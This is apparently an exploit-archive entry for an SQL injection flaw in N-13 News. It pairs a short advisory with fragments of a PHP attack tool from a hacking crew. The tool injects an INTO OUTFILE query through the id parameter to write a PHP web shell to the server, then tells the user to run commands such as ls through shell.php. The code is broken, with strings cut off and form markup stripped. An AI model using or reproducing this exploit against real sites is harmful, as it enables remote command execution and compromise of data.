source: https://www.securityfocus.com/bid/15643/info N-13 News is prone to an SQL injection vulnerability. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. All versions of N-13 News are considered to be affected at the moment. .::KingOfSka N-13 News Remote PHP Shell Injection::. || http://contropotere.altervista.org ||
.::KingOfSka N-13 News PHP Shell Injection::. || Contro Potere Hacking Crew ||


' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; $sql = urlencode($sql); $expurl= $url."?id=".$sql ; echo ' Click Here to Exploit
'; echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; } else { ?> Url to index.php:
" method = "post">
Server Path to Shell:
Full server path to a writable file which will contain the Php Shell